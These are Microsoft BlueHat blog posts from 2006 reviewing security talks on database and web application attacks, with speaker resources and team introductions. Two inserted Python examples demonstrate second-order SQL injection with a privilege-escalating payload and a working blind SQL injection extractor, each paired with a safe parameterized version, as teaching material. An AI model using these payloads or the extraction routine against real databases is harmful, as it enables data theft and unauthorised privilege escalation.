BlueHat Hackers?
There have been some misconceptions recently around both security researchers we bring in for Blue Hat, and security consulting companies that also help us make our products. I’ve even seen the phrase “Blue hat hackers” thrown around.
While it was terribly flattering (and somewhat amusing) to the BlueHat team to see the incredibly talented consultants working with us to secure our products referred to as BlueHat Hackers, there really is no such thing. Security researchers may choose to self-identify as white hat, grey hat, black hat, or no hat at all, but I wouldn’t even refer to our in-house full time pen-testers as BlueHat Hackers. Though I think the vendors and our full time pen testers all have a pretty good sense of humor and are having fun with this.
Talk reviews coming soon to the blog… Search Engine Hacking by Johnny Long and Database Rootkits by Alexander Kornbrust
The BlueHat team has been getting a lot of questions from both inside and outside of Microsoft asking if we are going to publicly post video or audio recordings of the BlueHat presentations, or if we are going to hoard the BlueHatty goodness and keep the presentation details all to ourselves... A totally valid question since all of our BlueHat presentations from 2005 and 2006 are fantastic and things any developer or IT Pro could benefit from seeing.
BlueHat speakers present at a number of public conferences, many of the speakers have written books, and in some cases speakers are willing to schedule private presentations to interested groups. So while we don’t want to deprive customers of information that could help them improve their enterprise or product security, Microsoft is also respectful of our speakers’ expertise and the business they derive from that. To that end, we are attempting to provide a list of publicly available resources you might reference for additional information.
(speakers – please let me know if I’ve missed something and I’ll update the posting!!)
~Kymberlee
Upcoming Public Presentations & Training (listed in date order)
Caleb Sima - Methodologies and Demos of Web Application Hacks: ISSA Charlotte 3rd Annual Information Security Summit, Charlotte NC, March 23
Vinnie Liu - Bleeding-edge Anti-forensics: InfoSecWorld 2006, Orlando FL, April 3-5
HD Moore - Metasploitation (and a dash of IPS): CanSecWest, Vancouver BC, April 5-7
Halvar Flake - More on Uninitialized Variables: CanSecWest, Vancouver BC, April 5-7
Alex Stamos & Scott Stender - Attacking Web Services: CanSecWest, Vancouver BC, April 5-7
Vinnie Liu - Defeating Forensic Analysis: Computer and Enterprise Investigations Conference 2006 (CEIC), Lake Las Vegas NV, May 3-6
David Litchfield - Breakable: Secure Your Oracle Servers By Breaking Into Them: Black Hat Training, Las Vegas NV, July 29-30 and again July 31-August 1
Kev Dunn - Advanced Database Security Assessment: Black Hat Training, Las Vegas NV, July 29-30 and again July 31-August 1
Halvar Flake - Analyzing Software for Security Vulnerabilities: Black Hat Training, Las Vegas NV, July 31-August 1
Halvar Flake – SABRE Security Training, Frankfurt Germany, October 2006
On Demand Webcasts, Videos, & Presentations
Caleb Sima: http://www.spidynamics.com/spilabs/education/webcasts.html
Caleb Sima: http://www.spidynamics.com/spilabs/education/videos.html
Brett Moore: http://www.security-assessment.com/tech-1.htm
BlueHat speakers present at many conferences worldwide, but Black Hat and ShmooCon are the only conferences we are aware of that offer a public archive of prior conference presentations.
http://www.blackhat.com/html/bh-media-archives/bh-multi-media-archives.html.
http://www.shmoocon.org/schedule.html
*whoops, RECon and HITB also have online archives... Thanks TG for the reminder.
Books
David Litchfield: The Database Hacker's Handbook: Defending Database Servers (ISBN: 0764578014)
David Litchfield: The Shellcoder's Handbook : Discovering and Exploiting Security Holes (ISBN: 0764544683)
David Litchfield: SQL Server Security (ISBN: 0072225157)
Caleb Sima: Hacking Exposed Web Applications, Second Edition (Hacking Exposed) (ISBN: 0072262990)
Johnny Long: Google Hacking for Penetration Testers (ISBN: 1931836361)
Vinnie Liu, Johnny Long: Penetration Tester's Open Source Toolkit (ISBN: 1597490210)
Vinnie Liu: Writing Security Tools and Exploits (ISBN: 1597499978)
Dan Kaminsky: Hack Proofing Your Network 2nd Edition (ISBN: 1928994709)
David Maynor: ISS X-Force: Next Generation Threat Analysis and Prevention (ISBN: 1597490563)
UPDATED MARCH 29, 2006 to add upcoming presentations by Vinnie Liu, change authors listed on Penetration Tester's Open Source Toolkit, and add two more conference archives.
Caleb Sima: Exploiting Web Applications
Halvar Flake: BinDiff Analysis
HD Moore: How not to deploy ASP.Net applications & Metasploit
Alexander Kornbrust: Database Viruses & Rootkits
Enjoy,
Brad Sarsfield
Brad Sarsfield here again. I’d like to share with you my thoughts on David Litchfield’s BlueHat v3 talk. David Litchfield is the Chief Research Scientist at Next Generation Security Software (NGS) and spoke to a 600+ standing room only crowd at BlueHat 3 on March 9th. David took us through his thoughts on the current state of the database security world and talked about the current focus areas of his research.
David did not discuss specific database vulnerabilities but rather showed the concepts behind subverting the database application logic to attack the database. David talked about SQL injection inside the database and also second-order SQL injection inside the database, whereby data is stored in the database and at a later time is used in a place vulnerable to SQL injection.
David talked through the possible dangers of having system stored procedures and triggers that could be vulnerable to SQL injection. Since triggers execute under the permissions of their owner, a trigger that is vulnerable to SQL injection lets an attacker cross that permission boundary and use it to escalate privileges inside the database.
If a malicious user has access to the database and there is a SQL injection vulnerability in a stored procedure or trigger that runs outside of their permission boundary, they can use the vulnerable SP or trigger to grant themselves privileges they are not supposed to have.
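The following is an added example (not code from David’s talk or from this blog) that shows the second-order case described above in Python against an in-memory SQLite database. SQLite has no database users or grants, so the permission boundary is only modelled: a `role` column stands in for the privilege being escalated, and an owner-run maintenance job stands in for the trigger or stored procedure that executes with its owner’s rights. All table, column and function names are made up for the example.

```python
import sqlite3

# Constructed example: an application that parameterizes its own input, but
# whose owner-run maintenance job rebuilds SQL from data already stored in the
# database. SQLite has no users or grants, so the "privilege" being escalated
# is modelled as the role column, and the batch job stands in for the trigger
# or stored procedure that executes with the owner's rights.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (
            id   INTEGER PRIMARY KEY,
            name TEXT NOT NULL UNIQUE,
            role TEXT NOT NULL DEFAULT 'user'
        );
        CREATE TABLE sessions (username TEXT NOT NULL, token TEXT NOT NULL);
        """
    )
    return conn


def register_user(conn, name):
    """Front door for attacker-controlled input. This INSERT is parameterized,
    so a scanner pointed at it finds nothing: the hostile string is stored
    verbatim and does no harm yet."""
    conn.execute("INSERT INTO users (name) VALUES (?)", (name,))
    conn.commit()


def open_session(conn, name, token):
    conn.execute("INSERT INTO sessions (username, token) VALUES (?, ?)", (name, token))
    conn.commit()


def purge_sessions_vulnerable(conn):
    """Nightly maintenance run by the database owner. The names come from the
    database rather than from a request, so the author treated them as trusted
    and concatenated them into a script. That is the second-order injection:
    the payload planted through register_user() only fires here, with the
    owner's rights."""
    script = ""
    for (name,) in conn.execute("SELECT name FROM users").fetchall():
        script += f"DELETE FROM sessions WHERE username = '{name}';\n"
    conn.executescript(script)


def purge_sessions_safe(conn):
    """Same job, but every value stays a bound parameter, so stored data can
    never become SQL syntax no matter where it was originally entered."""
    names = [row[0] for row in conn.execute("SELECT name FROM users").fetchall()]
    conn.executemany("DELETE FROM sessions WHERE username = ?", [(n,) for n in names])
    conn.commit()


def role_of(conn, name):
    row = conn.execute("SELECT role FROM users WHERE name = ?", (name,)).fetchone()
    return row[0] if row else None


def session_count(conn):
    return conn.execute("SELECT count(*) FROM sessions").fetchone()[0]


# The registered "name". It closes the quoted literal the maintenance job wraps
# it in, appends a statement only the owner could run, and comments out the
# rest of that line so the script still parses.
PAYLOAD = "mallory'; UPDATE users SET role = 'admin' WHERE name LIKE 'mallory%'; --"


def demo(purge):
    """Register a normal user and the attacker, open a session for each, run
    the given purge routine, and report (attacker's role, sessions left)."""
    conn = make_db()
    register_user(conn, "alice")
    register_user(conn, PAYLOAD)
    open_session(conn, "alice", "t1")
    open_session(conn, PAYLOAD, "t2")
    purge(conn)
    return role_of(conn, PAYLOAD), session_count(conn)


if __name__ == "__main__":
    # The injected DELETE only matched the literal 'mallory', so the attacker's
    # own session survives: the job also silently did the wrong thing.
    print("vulnerable:", demo(purge_sessions_vulnerable))  # ('admin', 1)
    print("safe:      ", demo(purge_sessions_safe))        # ('user', 0)
```

The point to take from it is that the entry point a scanner tests is clean; the bug is in code that never sees a request, which is why the takeaway that tools are not enough applies so directly to database-side logic.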
At the end of the day:
1) Tools are not enough. Your database and application design need to have clear forethought. Tools are a good start but don’t rely on them to catch all of your mistakes. (That's exactly what our own security experts have been telling us)
2) Triggers can be dangerous. Think about how you use them carefully.
3) Even low-risk issues should be respected.
If you’re interested in David Litchfield’s work I would highly suggest a book that he co-authored titled “The Database Hacker's Handbook: Defending Database Servers” (ISBN: 0764578014)
Over the next few days we’ll all be writing about the BlueHat sessions… Today I’m excited to have a chance to tell you more about the Exploiting Web Applications presentation made by Caleb Sima, CTO and co-founder of SPI Dynamics at BlueHat 3 on March 9th. (Listen to a podcast interview with Caleb here.)
So you've installed all the latest patches, no one opened any malicious attachments, you've got all the right ports shut down, you've got your firewall, anti-virus software and IDS all running and up to date - and you still got hacked. How did it happen?
This presentation walked the audience through a real penetration test of a bank, and showed our engineers just how the hack happens. I’ll be honest, this was a somewhat unusual talk for us to have at BlueHat - it wasn’t about vulnerabilities in a Microsoft product specifically - in fact the demonstration Caleb walked through wasn’t even Microsoft technology based. But seeing how a malicious hacker can use techniques like SQL injection and blind SQL injection to extract your entire database regardless of what vendor’s software you are using was pretty cool. It isn't every day that you get a glimpse into how malicious hackers find vulnerabilities to access data through web applications, and what can be done to better defend that data.
Caleb is a very engaging speaker and the insight he shared on the methodology a web application hacker uses to approach a target was educational and entertaining. He not only demonstrated the basic premise of these techniques and how to manually execute them, but how they can be easily automated with tools – the hacker can go to dinner and come back to a nice report of results. But not only is the exploit automated, the research to find an attack target can also be automated! In the next part of the presentation Caleb showed how using common search engines a hacker can identify tens of thousands of vulnerable targets (and even narrow those target searches down to the most interesting domains) in just a few minutes.
All data is valuable; the risk of having your web application broken into is not just credit card fraud or identity theft of your customers. There are also real life examples of one business putting a competitor out of business by accessing customer lists, pricing plans, and design schematics to give them an edge.
So how do you protect your data? It isn’t enough to just limit the amount of information in your error messages that may give hackers a roadmap into your database – that doesn’t protect you against blind SQL injection attacks. The majority of web application attacks can be solved by input validation!
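To make the blind SQL injection point concrete, here is an added example (not from Caleb’s presentation or this blog) in Python against an in-memory SQLite database. The application exposes only a yes/no “does this user exist?” check, shows no data and no error text, and is still read out one character at a time; the parameterized version of the same check gives the same attack nothing. The table, the planted secret and the function names are all constructed for the example.

```python
import sqlite3

# Constructed example: a "does this account exist?" check whose only output is
# yes/no. Nothing from the database is ever displayed, so trimming error
# messages buys nothing here; one bit per request is enough to read out any
# column, which is what blind (boolean-based) SQL injection does.

SECRET = "s3cr3t!"  # the value the attacker wants and never sees directly


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("admin", SECRET), ("alice", "letmein")])
    conn.commit()
    return conn


def user_exists_vulnerable(conn, name):
    """Query built by concatenation. Returns only True/False: no data, no errors."""
    sql = "SELECT id FROM users WHERE name = '" + name + "'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # "quiet" error handling; the attacker still gets a bit


def user_exists_safe(conn, name):
    """Same check with a bound parameter: the input can only ever be a value."""
    sql = "SELECT id FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchone() is not None


def blind_extract(oracle, column, where, max_len=64):
    """Recover users.<column> for the row matching <where> using only the
    yes/no answers of oracle(payload). Each character costs about seven
    requests (a binary search over printable ASCII 32..126) plus one request
    to learn whether the string has another character at all."""
    target = f"(SELECT {column} FROM users WHERE {where})"
    result = ""
    for pos in range(1, max_len + 1):
        # Is there a character at this position? If not, we are done.
        if not oracle(f"' OR length({target}) >= {pos} --"):
            break
        # Binary search the code point. Comparing unicode() values means the
        # payload never needs a quote character of its own.
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"' OR unicode(substr({target}, {pos}, 1)) > {mid} --"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


def count_calls(fn):
    """Wrap an oracle so the number of requests the attack needed is visible."""
    calls = [0]

    def wrapped(payload):
        calls[0] += 1
        return fn(payload)

    wrapped.calls = calls
    return wrapped


if __name__ == "__main__":
    db = make_db()
    attack = count_calls(lambda p: user_exists_vulnerable(db, p))
    print("vulnerable:", blind_extract(attack, "password", "name = 'admin'"),
          "in", attack.calls[0], "requests")
    attack = count_calls(lambda p: user_exists_safe(db, p))
    print("safe:", repr(blind_extract(attack, "password", "name = 'admin'")))
```

A few dozen requests recover a seven-character value; an automated tool does the same for every column of every table, which is the “go to dinner and come back to a report” scenario above. Input validation keeps the obvious payloads out, but the fix that actually closes the hole is keeping user input out of the query text altogether, as `user_exists_safe` does with a bound parameter.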
Unfortunately, time ran out before Caleb had a chance to get to his last segment – some very early research he is doing on how a hacker could manipulate search engine results to push their website further up in the rankings. The audience (close to 700 engineers) was audibly disappointed, so Caleb offered to come back at the end of the day and present another 20 minutes to cover this topic. And at the end of a full conference day, everyone in the audience stayed late to see this additional content.
And I’ve got to take a moment to thank Caleb for his sporting sense of humor – without warning him, I arranged to air The Code Room – Breaking Into Vegas to the audience over lunch, a couple hours before his BlueHat presentation. This is an educational and entertaining 30 minute video about a casino being hacked through their web application, so it was a perfect addition to the Thursday BlueHat agenda focusing on database and web application security. Why would I have warned Caleb? You won’t find it on imdb, but Caleb is one of the actors in the video, along with several other security luminaries like John Viega, Joel Scambray, and Frank Swiderski. Thanks guys. :)
Next talk review coming to the blog… Current Database Vulnerability Research by David Litchfield
The BlueHat blog has been up less than 24 hours, and it was quoted this morning in an article by Robert McMillan on InfoWorld. That article has already hit /. Some of the comments are pretty funny...
I can't wait for the speaker podcasts and channel9 video to go live so people can hear directly from the BlueHat speakers! As soon as they are published, we'll highlight the links here.
Hi, I'm Brad Sarsfield (bradsa!); I’m the SQL guy here. One of the interesting things about me and my team is that I own the ‘slammer’ component in SQL Server, so by that very nature quite a large part of my job description is to ensure (and I quote) “that never … ever … happens again”. So by default that makes me a SQL security guy and I work quite closely within the SQL Server security team.
In my adventures to fulfill my job description I’ve met a lot of brilliant database security researchers like David Litchfield, Kevin Dunn and Alexander Kornbrust. I’ve had conversations with these and other researchers that I really wish I could have shared with 1000 of my SQL Server engineering colleagues. So after a few of the “I wish everyone working on SQL Server could hear this right now!” moments I talked Kymberlee Price and Andrew Cushman into adding another day; thus we added another day focused on SQL, Data and Web application security.
The first day was a condensed set of talks to senior product leadership and executive types. The second day took a SQL, Data and Web application focus while the third day focused in on the Windows Platform.
On the first day, putting around 40 highly technical senior level engineers, architects and executives in a room for a few hours with some of the top security researchers in the world was an amazing sight, oh and we did it twice that day (March 8th). It was open and honest discussion about problems specific to Microsoft technologies and also problems that affect our entire industry. Some of the speakers gave a condensed version of their talk during this session.
Everything was fair game. Hearing senior executives say things like: “I want the people responsible for those features in my office early next week; I want to get to the bottom of this” was at least one measure of success from my point of view for the event. The speakers were quite impressed with the technical depth that our executives have.
Stay tuned as we bring more content online at the BlueHat technet site.
Brad Sarsfield
Microsoft SQL Server
bradsa@microsoft.com
BlueHat 3 just completed last week, and all I can say is WOW. Great speakers. Great presentations. Packed audience. You can read the session abstracts and speaker bios here to see what I'm talking about.
OH! I should introduce myself. Where are my manners? I'm Kymberlee Price, a Security Program Manager at Microsoft. The organizational taxonomy of where I work at Microsoft is kind of crazy* - the short explanation is that I'm in an engineering group that is responsible for product security across Microsoft - both products we have and haven't shipped yet. When I'm not busy planning BlueHat, I do a variety of things to help Microsoft developers and external security researchers connect and learn from each other with the ultimate goal of providing a more secure computing experience for users.
Of course no one person can plan a three day conference on their own - I work with a team of great people who you will also see here on the BlueHat Blog. Over the coming days we'll be posting our reflections on BlueHat 3 as well as photos and links to podcasts and channel9 video from the event. And we sincerely hope that our BlueHat 3 speakers (and BlueHat 1 & 2 speakers) will post their comments to the site as well and share their BlueHat experience with you.
~Kymberlee Price
Security Program Manager
Security Engineering & Communications Group
Security Technology Unit
Microsoft Corporation
*see what I mean?